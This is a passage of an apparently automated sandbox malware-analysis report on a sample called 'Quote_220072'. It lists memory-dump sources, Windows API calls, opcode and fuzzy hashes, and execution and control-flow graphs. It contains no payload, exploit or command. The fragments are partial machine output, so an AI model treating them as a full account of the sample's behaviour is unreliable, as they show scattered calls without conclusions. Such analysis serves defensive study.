                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: CharPrevlstrcatlstrlen
                                                                              • String ID: C:\Users\user\AppData\Local\Temp\
                                                                              • API String ID: 2659869361-297319885
                                                                              • Opcode ID: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
                                                                              • Instruction ID: 997ea4b4438496dccce44eacbb2634370b3c3ae0899ac86cf6792f2d8b8f87b4
                                                                              • Opcode Fuzzy Hash: d05188d841616a9e1b7d59f18f8490afccaafd82e288364c4b54bb9922993767
                                                                              • Instruction Fuzzy Hash: F7D05E31102924AFC2026B58AE08D9B77ACEF46341341406EFAC1B3160CB745D5287ED
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1656920122.000000006FF81000.00000020.00000001.01000000.00000006.sdmp, Offset: 6FF80000, based on PE: true
                                                                              • Associated: 00000000.00000002.1656896875.000000006FF80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1656977561.000000006FF84000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1656996339.000000006FF86000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_6ff80000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: FreeGlobal$__alldvrm
                                                                              • String ID:
                                                                              • API String ID: 482422042-0
                                                                              • Opcode ID: 528acab676e03b8bbd1e2a688bd50fcb6fef5fe6b32b20a0e06dabd8c928b834
                                                                              • Instruction ID: b1a424f18152a33c41ba0db97387f50b6f2739dad30f1e9e4ffcc0c26ba8837b
                                                                              • Opcode Fuzzy Hash: 528acab676e03b8bbd1e2a688bd50fcb6fef5fe6b32b20a0e06dabd8c928b834
                                                                              • Instruction Fuzzy Hash: 035107737483068B97149E798984ABA77F6BFCA714B104B2EF072C7350F7A1F9858252
                                                                              APIs
                                                                              • DestroyWindow.USER32(00000000), ref: 00403378
                                                                              • GetTickCount.KERNEL32 ref: 00403397
                                                                              • CreateDialogParamW.USER32(0000006F,00000000,0040362D,00000000), ref: 004033B6
                                                                              • ShowWindow.USER32(00000000,00000005), ref: 004033C4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1623660503.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1623644463.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623678591.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1623697107.00000000007B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1624047871.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                              • String ID:
                                                                              • API String ID: 2102729457-0
                                                                              • Opcode ID: 357b023d8aff776a3d5515b2d6cdf3b091415c345a00606534bd97e45556d1c1
                                                                              • Instruction ID: 5fb2c38a213eff1d2f515c73fe307429b33afba48c29838db2cc379488067e45
                                                                              • Opcode Fuzzy Hash: 357b023d8aff776a3d5515b2d6cdf3b091415c345a00606534bd97e45556d1c1
                                                                              • Instruction Fuzzy Hash: C9F0F870551700EBDB209F60EF8EB163AA8B740B02F505579F941B51F0DB788514CA5C

                                                                              Execution Graph

                                                                              Execution Coverage:10.1%
                                                                              Dynamic/Decrypted Code Coverage:96.5%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:85
                                                                              Total number of Limit Nodes:5
                                                                              execution_graph 41708 3488ae28 41709 3488ae6e GetCurrentProcess 41708->41709 41711 3488aeb9 41709->41711 41712 3488aec0 GetCurrentThread 41709->41712 41711->41712 41713 3488aefd GetCurrentProcess 41712->41713 41714 3488aef6 41712->41714 41715 3488af33 41713->41715 41714->41713 41716 3488af5b GetCurrentThreadId 41715->41716 41717 3488af8c 41716->41717 41695 377e40e8 41696 377e43f0 41695->41696 41697 377e4110 41695->41697 41698 377e4119 41697->41698 41701 377e312c 41697->41701 41700 377e413c 41700->41700 41702 377e3137 41701->41702 41703 377e4433 41702->41703 41705 377e3148 41702->41705 41703->41700 41706 377e4468 OleInitialize 41705->41706 41707 377e44cc 41706->41707 41707->41703 41795 3488b070 DuplicateHandle 41796 3488b106 41795->41796 41718 3791e6b8 41719 3791e720 CreateWindowExW 41718->41719 41721 3791e7dc 41719->41721 41722 3470d01c 41723 3470d034 41722->41723 41724 3470d08e 41723->41724 41730 3791fe88 41723->41730 41737 3791e304 41723->41737 41744 3791e870 41723->41744 41748 3791e861 41723->41748 41752 3791e8bf 41723->41752 41731 3791fe98 41730->41731 41732 3791fef7 41731->41732 41757 377e001f 41731->41757 41762 377e0040 41731->41762 41767 377e00e7 41731->41767 41775 377e0007 41731->41775 41738 3791e30f 41737->41738 41739 3791fef7 41738->41739 41740 377e001f 2 API calls 41738->41740 41741 377e0007 2 API calls 41738->41741 41742 377e00e7 2 API calls 41738->41742 41743 377e0040 2 API calls 41738->41743 41740->41739 41741->41739 41742->41739 41743->41739 41745 3791e87d 41744->41745 41746 3791e304 2 API calls 41745->41746 41747 3791e8b7 41746->41747 41747->41724 41749 3791e870 41748->41749 41750 3791e304 2 API calls 41749->41750 41751 3791e8b7 41750->41751 41751->41724 41753 3791e8cf 41752->41753 41754 3791e87d 41752->41754 41753->41724 41755 3791e304 2 API calls 41754->41755 41756 3791e8b7 41755->41756 41756->41724 41759 377e0024 41757->41759 41758 377e00e0 41758->41732 41761 377e00e7 2 API calls 41759->41761 41780 377e00f8 41759->41780 41761->41758 41764 377e0054 41762->41764 41763 377e00e0 41763->41732 41765 377e00f8 2 API calls 41764->41765 41766 377e00e7 2 API calls 41764->41766 41765->41763 41766->41763 41768 377e00f2 41767->41768 41770 377e009c 41767->41770 41769 377e0109 41768->41769 41774 377e1af0 2 API calls 41768->41774 41769->41732 41772 377e00f8 2 API calls 41770->41772 41773 377e00e7 2 API calls 41770->41773 41771 377e00e0 41771->41732 41772->41771 41773->41771 41774->41769 41777 377e001c 41775->41777 41776 377e00e0 41776->41732 41778 377e00f8 2 API calls 41777->41778 41779 377e00e7 2 API calls 41777->41779 41778->41776 41779->41776 41781 377e0109 41780->41781 41783 377e1af0 41780->41783 41781->41758 41787 377e1b12 41783->41787 41791 377e1b20 41783->41791 41784 377e1b0a 41784->41781 41788 377e1b20 41787->41788 41789 377e1b69 41788->41789 41790 377e1bba CallWindowProcW 41788->41790 41789->41784 41790->41789 41792 377e1b62 41791->41792 41794 377e1b69 41791->41794 41793 377e1bba CallWindowProcW 41792->41793 41792->41794 41793->41794 41794->41784
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 71ea7338ef05e0201bd6fb1184aa238f87b3fbdf7731d53849f8cee1bd733dee
                                                                              • Instruction ID: 681b207683e5e4cfda7a8da04392afd5fc4ddb24960f6f12efdfe0f41038b250
                                                                              • Opcode Fuzzy Hash: 71ea7338ef05e0201bd6fb1184aa238f87b3fbdf7731d53849f8cee1bd733dee
                                                                              • Instruction Fuzzy Hash: D0B1C234B05315DBEB189F75885837E7BB7AFCD200B09856ED446EB384DE399C028796

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 0 379302b8-379302d9 1 379302db-379302de 0->1 2 379302e0-37930330 1->2 3 37930335-37930338 1->3 2->3 4 3793033a-3793034c 3->4 5 3793038d-37930390 3->5 6 3793035b-3793036a 4->6 7 3793034e-37930353 4->7 9 37930392-379303e2 5->9 10 379303e7-379303ea 5->10 11 37930370-37930388 6->11 12 37930f06-37930f3e 6->12 7->6 9->10 13 37930441-37930444 10->13 14 379303ec-3793043c 10->14 11->5 31 37930f40-37930f43 12->31 16 37930446-37930496 13->16 17 3793049b-3793049e 13->17 14->13 16->17 19 379304a0-379304a2 17->19 20 379304ad-379304b0 17->20 24 379306f3-379306ff 19->24 25 379304a8 19->25 26 379304b2-379304c4 20->26 27 37930505-37930508 20->27 40 37930701-37930706 24->40 41 3793070e-3793071d 24->41 25->20 36 379304d3-379304e2 26->36 37 379304c6-379304cb 26->37 34 37930512-37930515 27->34 35 3793050a-3793050f 27->35 32 37930f66-37930f69 31->32 33 37930f45-37930f61 31->33 45 37930f6b-37930f97 32->45 46 37930f9c-37930f9f 32->46 33->32 49 37930517-37930530 34->49 50 37930535-37930538 34->50 35->34 36->12 48 379304e8-37930500 36->48 37->36 40->41 43 37930723-3793073d 41->43 44 3793083f-37930844 41->44 81 3793084f 43->81 86 37930743-37930755 43->86 44->81 45->46 53 37930fa1 46->53 54 37930fae-37930fb0 46->54 48->27 49->50 56 3793053a-37930559 50->56 57 3793055e-37930561 50->57 70 37930fa7-37930fa9 53->70 60 37930fb2 54->60 61 37930fb7-37930fba 54->61 56->57 67 37930563-379305b3 57->67 68 379305b8-379305bb 57->68 60->61 61->31 73 37930fbc-37930fcb 61->73 67->68 71 37930612-37930615 68->71 72 379305bd-3793060d 68->72 70->54 83 37930617-37930667 71->83 84 3793066c-3793066f 71->84 72->71 98 37931033-37931048 73->98 99 37930fcd-37931031 73->99 87 37930852-37930861 81->87 83->84 84->87 88 37930675-37930678 84->88 110 37930757-3793075d 86->110 111 37930779-3793077b 86->111 87->4 100 37930867-37930c79 87->100 96 3793067a-379306ca 88->96 97 379306cf-379306d2 88->97 96->97 106 379306e1-379306e3 97->106 107 379306d4-379306d6 97->107 99->98 238 37930ef8-37930f05 100->238 239 37930c7f-37930c88 100->239 116 379306e5 106->116 117 379306ea-379306ed 106->117 107->81 114 379306dc 107->114 119 37930761-3793076d 110->119 120 3793075f 110->120 126 37930785-37930798 111->126 114->106 116->117 117->1 117->24 124 3793076f-37930777 119->124 120->124 124->126 126->81 145 3793079e-379307b9 126->145 154 379307bb-379307c0 145->154 155 379307c8-379307d7 145->155 154->155 155->44 157 379307d9-3793083d 155->157 157->81 240 37930c97-37930ca3 239->240 241 37930c8a-37930c8f 239->241 240->12 242 37930ca9-37930cbd 240->242 241->240 245 37930cc3-37930ccc 242->245 246 37930ee5-37930ef2 242->246 247 37930cdb-37930ce7 245->247 248 37930cce-37930cd3 245->248 246->238 246->239 247->12 249 37930ced-37930d1c 247->249 248->247 253 37930d2b-37930d37 249->253 254 37930d1e-37930d23 249->254 253->12 255 37930d3d-37930d66 253->255 254->253 255->246 258 37930d6c-37930d75 255->258 258->12 259 37930d7b-37930d97 258->259 261 37930ed5-37930edf 259->261 262 37930d9d-37930dcc 259->262 261->246 261->258 262->12 266 37930dd2-37930ddc 262->266 266->12 267 37930de2-37930df9 266->267 269 37930dfb-37930e06 267->269 270 37930e08-37930e29 267->270 269->270 270->261 275 37930e2f-37930e44 270->275 277 37930e53-37930e5f 275->277 278 37930e46-37930e4b 275->278 277->12 279 37930e65-37930ece 277->279 278->277 279->261
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: c<$"c<$&c<$&c<$'c<$+c<$0c<$1c<$5c<$6c<$Ac<$Gc<$Gc<$Lc<$Mc<$Uc<$Uc<$Wc<$Zc<$\O'7$\O'7$\O'7$bc<$mc<$nc<$rc<$tc<$wc<$|c<$c<$c<$c<$c<
                                                                              • API String ID: 0-2439685837
                                                                              • Opcode ID: ea56caa833b7c3dc7e3fb4f83f0c50a3b2ff610f880204ff4ef962da32ce3e2d
                                                                              • Instruction ID: cd414f23dd0337b717b84aa3764f4a0432f277459551a0777ea0161c2649ac8f
                                                                              • Opcode Fuzzy Hash: ea56caa833b7c3dc7e3fb4f83f0c50a3b2ff610f880204ff4ef962da32ce3e2d
                                                                              • Instruction Fuzzy Hash: 92724C34B01318CFEB14DFA8C950A6DB7F7AF85314F6086AAC449AB351DF759C818BA1

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 943 3488ae22-3488aeb7 GetCurrentProcess 947 3488aeb9-3488aebf 943->947 948 3488aec0-3488aef4 GetCurrentThread 943->948 947->948 949 3488aefd-3488af31 GetCurrentProcess 948->949 950 3488aef6-3488aefc 948->950 952 3488af3a-3488af55 call 3488aff8 949->952 953 3488af33-3488af39 949->953 950->949 955 3488af5b-3488af8a GetCurrentThreadId 952->955 953->952 957 3488af8c-3488af92 955->957 958 3488af93-3488aff5 955->958 957->958
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32 ref: 3488AEA6
                                                                              • GetCurrentThread.KERNEL32 ref: 3488AEE3
                                                                              • GetCurrentProcess.KERNEL32 ref: 3488AF20
                                                                              • GetCurrentThreadId.KERNEL32 ref: 3488AF79
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2585841086.0000000034880000.00000040.00000800.00020000.00000000.sdmp, Offset: 34880000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_34880000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: Current$ProcessThread
                                                                              • String ID:
                                                                              • API String ID: 2063062207-0
                                                                              • Opcode ID: 1a46e3518b413a2beb47930b9b45223ad0805b47a8057dd312928efe150d3c1d
                                                                              • Instruction ID: 28903ac91d2cdfffd3329f0b53b39cffa7e3be56b61b52d08fd92b9e2561ddcc
                                                                              • Opcode Fuzzy Hash: 1a46e3518b413a2beb47930b9b45223ad0805b47a8057dd312928efe150d3c1d
                                                                              • Instruction Fuzzy Hash: B15166B090074A8FDB00CFAAC548BDEBBF1EF88310F248459E409A7391D775A984CB65

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 965 3488ae28-3488aeb7 GetCurrentProcess 969 3488aeb9-3488aebf 965->969 970 3488aec0-3488aef4 GetCurrentThread 965->970 969->970 971 3488aefd-3488af31 GetCurrentProcess 970->971 972 3488aef6-3488aefc 970->972 974 3488af3a-3488af55 call 3488aff8 971->974 975 3488af33-3488af39 971->975 972->971 977 3488af5b-3488af8a GetCurrentThreadId 974->977 975->974 979 3488af8c-3488af92 977->979 980 3488af93-3488aff5 977->980 979->980
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32 ref: 3488AEA6
                                                                              • GetCurrentThread.KERNEL32 ref: 3488AEE3
                                                                              • GetCurrentProcess.KERNEL32 ref: 3488AF20
                                                                              • GetCurrentThreadId.KERNEL32 ref: 3488AF79
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2585841086.0000000034880000.00000040.00000800.00020000.00000000.sdmp, Offset: 34880000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_34880000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: Current$ProcessThread
                                                                              • String ID:
                                                                              • API String ID: 2063062207-0
                                                                              • Opcode ID: ea34d0e3d936adf07de4905383dd4911bd30b37c23563d0142ff60796efff67f
                                                                              • Instruction ID: 13db6ba35ebbff385e28c3d6873ab8a4d5fb213a104930417ee4691e95bf421a
                                                                              • Opcode Fuzzy Hash: ea34d0e3d936adf07de4905383dd4911bd30b37c23563d0142ff60796efff67f
                                                                              • Instruction Fuzzy Hash: 2D5146B091074A8FDB04CFAAD548BDEBBF5EF88310F208459E409A7391D775A984CB65

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2402 3791e6ac-3791e71e 2404 3791e720-3791e726 2402->2404 2405 3791e729-3791e730 2402->2405 2404->2405 2406 3791e732-3791e738 2405->2406 2407 3791e73b-3791e773 2405->2407 2406->2407 2408 3791e77b-3791e7da CreateWindowExW 2407->2408 2409 3791e7e3-3791e81b 2408->2409 2410 3791e7dc-3791e7e2 2408->2410 2414 3791e828 2409->2414 2415 3791e81d-3791e820 2409->2415 2410->2409 2416 3791e829 2414->2416 2415->2414 2416->2416
                                                                              APIs
                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3791E7CA
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2586987689.0000000037910000.00000040.00000800.00020000.00000000.sdmp, Offset: 37910000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_37910000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: CreateWindow
                                                                              • String ID:
                                                                              • API String ID: 716092398-0
                                                                              • Opcode ID: 0864b998bdecc033b9cad4fa6c84884502e15d9b5f94e3bfaad3705bb6f661fe
                                                                              • Instruction ID: f105cc830a8ba9f85decdb07caa8ed936c17944ca046db7b284856d6e7358d0a
                                                                              • Opcode Fuzzy Hash: 0864b998bdecc033b9cad4fa6c84884502e15d9b5f94e3bfaad3705bb6f661fe
                                                                              • Instruction Fuzzy Hash: AD51C0B5D00349EFEB14CF99C880ADEBBB5BF48314F24862AE418AB210D771A841CF90

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2417 3791e6b8-3791e71e 2418 3791e720-3791e726 2417->2418 2419 3791e729-3791e730 2417->2419 2418->2419 2420 3791e732-3791e738 2419->2420 2421 3791e73b-3791e7da CreateWindowExW 2419->2421 2420->2421 2423 3791e7e3-3791e81b 2421->2423 2424 3791e7dc-3791e7e2 2421->2424 2428 3791e828 2423->2428 2429 3791e81d-3791e820 2423->2429 2424->2423 2430 3791e829 2428->2430 2429->2428 2430->2430
                                                                              APIs
                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 3791E7CA
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2586987689.0000000037910000.00000040.00000800.00020000.00000000.sdmp, Offset: 37910000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_37910000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: CreateWindow
                                                                              • String ID:
                                                                              • API String ID: 716092398-0
                                                                              • Opcode ID: 9622c1a039774ca250aba57ddc905374f44e60392c69e1a2f1c1a4646e5a7991
                                                                              • Instruction ID: 15a096a84db2cc1e3776fce87043d1e9b7a8020657490c731176a0c6065b1be4
                                                                              • Opcode Fuzzy Hash: 9622c1a039774ca250aba57ddc905374f44e60392c69e1a2f1c1a4646e5a7991
                                                                              • Instruction Fuzzy Hash: A241C1B5D00309DFEB14CF99C880ADEBBB5BF48314F24822AE419AB210D775A841CF90

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 2431 377e1b20-377e1b5c 2432 377e1c0c-377e1c2c 2431->2432 2433 377e1b62-377e1b67 2431->2433 2439 377e1c2f-377e1c3c 2432->2439 2434 377e1bba-377e1bf2 CallWindowProcW 2433->2434 2435 377e1b69-377e1ba0 2433->2435 2437 377e1bfb-377e1c0a 2434->2437 2438 377e1bf4-377e1bfa 2434->2438 2441 377e1ba9-377e1bb8 2435->2441 2442 377e1ba2-377e1ba8 2435->2442 2437->2439 2438->2437 2441->2439 2442->2441
                                                                              APIs
                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 377E1BE1
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2586806325.00000000377E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_377e0000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: CallProcWindow
                                                                              • String ID:
                                                                              • API String ID: 2714655100-0
                                                                              • Opcode ID: 233705f5669708b5b30e8ebf4044319db55e53886dda8352b72f3c87615bed4c
                                                                              • Instruction ID: f5534a754fbf79d47359d64b6e6e02ce748ff636c79936302fad9a1d5ad5cd6a
                                                                              • Opcode Fuzzy Hash: 233705f5669708b5b30e8ebf4044319db55e53886dda8352b72f3c87615bed4c
                                                                              • Instruction Fuzzy Hash: 744129B89003099FDB04CF99C445A9AFBF6FF89310F258499D559AB321D774A841CFA0
                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3488B0F7
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2585841086.0000000034880000.00000040.00000800.00020000.00000000.sdmp, Offset: 34880000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_34880000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0
                                                                              • Opcode ID: 3f0708f14464a8b96be43e8eae0b1af1d04fa8afc1c3df7b592f6af53dc970e7
                                                                              • Instruction ID: 1460437211c0855ae027b72cc4f32ea0cd279582aee6d6816b92682cd83de5b2
                                                                              • Opcode Fuzzy Hash: 3f0708f14464a8b96be43e8eae0b1af1d04fa8afc1c3df7b592f6af53dc970e7
                                                                              • Instruction Fuzzy Hash: A42103B5900249AFDB10CFAAD980ADEFFF9EB48310F14802AE914A7350C375A940CFA1
                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3488B0F7
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2585841086.0000000034880000.00000040.00000800.00020000.00000000.sdmp, Offset: 34880000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_34880000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0
                                                                              • Opcode ID: 03791eef9b420f097561c4361889f987b20b96c03d6d26346c5480518f012645
                                                                              • Instruction ID: c051c2a869e75b9dcde4241090c8c6a08d53953e83e37053601f9a61f67cd57d
                                                                              • Opcode Fuzzy Hash: 03791eef9b420f097561c4361889f987b20b96c03d6d26346c5480518f012645
                                                                              • Instruction Fuzzy Hash: A621E4B59002499FDB10CFAAD980ADEBBF4EB48310F14801AE914A3350D374A940CFA1
                                                                              APIs
                                                                              • OleInitialize.OLE32(00000000), ref: 377E44BD
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2586806325.00000000377E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_377e0000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: Initialize
                                                                              • String ID:
                                                                              • API String ID: 2538663250-0
                                                                              • Opcode ID: f2bc65893a8ed3a458b9acd35afa9601504d87f5f36fbd412127cbca54a47fff
                                                                              • Instruction ID: 9d924e28fe0d09895d4ad69286400e0c13221e1e72abb45b432427bbd89728d3
                                                                              • Opcode Fuzzy Hash: f2bc65893a8ed3a458b9acd35afa9601504d87f5f36fbd412127cbca54a47fff
                                                                              • Instruction Fuzzy Hash: 48112EB59003498FDB10CFAAD445BCEBBF8EF48320F24845AE518A7B00D379A940CBA5
                                                                              APIs
                                                                              • OleInitialize.OLE32(00000000), ref: 377E44BD
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2586806325.00000000377E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 377E0000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_377e0000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID: Initialize
                                                                              • String ID:
                                                                              • API String ID: 2538663250-0
                                                                              • Opcode ID: 9dc5b41f29b0210ae2767a85d5f5a5afe998be2bed400ace13891f3c5addc219
                                                                              • Instruction ID: c2bd0bbc9438f6483ef46984bb7b11e3c6b91278439bf904c48b0e11d32dc045
                                                                              • Opcode Fuzzy Hash: 9dc5b41f29b0210ae2767a85d5f5a5afe998be2bed400ace13891f3c5addc219
                                                                              • Instruction Fuzzy Hash: 001112B5A047499FDB10DF9AD544BDEBBF8EB49320F20845AE518A7700D378A940CFA5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: |
                                                                              • API String ID: 0-2343686810
                                                                              • Opcode ID: 08740ffc34e770ccde79890f943e5efef40ab6dbfc9b5f48210fb5dd8a5be1ad
                                                                              • Instruction ID: 2a5e508dea3ed9d0d6b3afb901b9758ce93b6ab125497745fd70d8569473aec9
                                                                              • Opcode Fuzzy Hash: 08740ffc34e770ccde79890f943e5efef40ab6dbfc9b5f48210fb5dd8a5be1ad
                                                                              • Instruction Fuzzy Hash: 56215C74B442209FEB44DB788804BAEBBF1AF4C700F14856AE54AEB391DB399911DB80
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: |
                                                                              • API String ID: 0-2343686810
                                                                              • Opcode ID: f1e5ae8d8cc158e9facd153c2ccf5b36c1c5ab247079040fd2dde7de333dad53
                                                                              • Instruction ID: 27bbaac16ae919b5b073b87cc35a49bf51f35978b2ccceef2c894c4c3c3ad26c
                                                                              • Opcode Fuzzy Hash: f1e5ae8d8cc158e9facd153c2ccf5b36c1c5ab247079040fd2dde7de333dad53
                                                                              • Instruction Fuzzy Hash: 5F114970B40214DFEB54DB788805B6E7BF5AB4C700F14846AE90AE73A0EB75A9018B84
                                                                              Memory Dump Source
                                                                              • Source File: 00000005.00000002.2587036764.0000000037930000.00000040.00000800.00020000.00000000.sdmp, Offset: 37930000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_5_2_37930000_Quote_220072.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8b99a039c6719c086d30c954969fb037877c58f8ab56894d39d9477dd9ab0be2
                                                                              • Instruction ID: 8c5734acf1028bf580e0261ebdc9acb49248a520ab6cce2e255a99015f1ff010
                                                                              • Opcode Fuzzy Hash: 8b99a039c6719c086d30c954969fb037877c58f8ab56894d39d9477dd9ab0be2
                                                                              • Instruction Fuzzy Hash: 59E15E35B00215CFDB14DFB8C854BADB7B6BF89200F208269D44AAB360DF759D46CB91
                                                                              Memory Dump Source
